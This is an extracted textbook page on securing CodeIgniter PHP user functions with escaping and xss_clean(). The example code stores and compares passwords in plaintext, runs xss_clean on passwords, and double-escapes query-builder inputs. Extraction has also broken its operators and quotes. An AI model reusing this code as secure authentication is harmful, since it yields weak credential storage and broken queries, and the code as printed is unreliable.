Chapter 9: Security and Performance
269
function verifyUser($u,$pw){
$this- > db- > select(‘id,username’);
$this- > db- > where(‘username’,$this- > db- > escape($u));
$this- > db- > where(‘password’, $this- > db- > escape($pw));
$this- > db- > where(‘status’, ‘active’);
$this- > db- > limit(1);
$Q = $this- > db- > get(‘admins’);
if ($Q- > num_rows() > 0){
$row = $Q- > row_array();
$this- > session- > set_userdata(‘userid’,$row[‘id’]);
$this- > session- > set_userdata(‘username’,$row[‘username’]);
}else{
$this- > session- > set_flashdata(‘error’, ‘Sorry, your username or password is
incorrect!’);
}
}You can do the same with getUser() — simply escape the incoming $id variable.function getUser($id){
$data = array();
$options = array(‘id’ = > $this- > db- > escape($id));
$Q = $this- > db- > getwhere(‘admins’,$options,1);
if ($Q- > num_rows() > 0){
$data = $Q- > row_array();
}
$Q- > free_result();
return $data;
}For addUser() and updateUser() , you ’ re going to deploy a new function, xss_clean() , which is part
of the Security helper (which you autoloaded back in Chapter 3 ). The xss_clean() function converts
malicious - looking JavaScript or other suspicious characters into entity references.
function addUser(){
$data = array(‘username’ = > xss_clean($_POST[‘username’]),
‘email’ = > xss_clean($_POST[‘email’]),
‘status’ = > xss_clean($_POST[‘status’]),
‘password’ = > xss_clean($_POST[‘password’])
);$this- > db- > insert(‘admins’,$data);
}function updateUser(){
$data = array(‘username’ = > xss_clean($_POST[‘username’]),
‘email’ = > xss_clean($_POST[‘email’]),
‘status’ = > xss_clean($_POST[‘status’]),
‘password’ = > xss_clean($_POST[‘password’])
);
$this- > db- > where(‘id’,$this- > db- > escape($_POST[‘id’]));
$this- > db- > update(‘admins’,$data);
}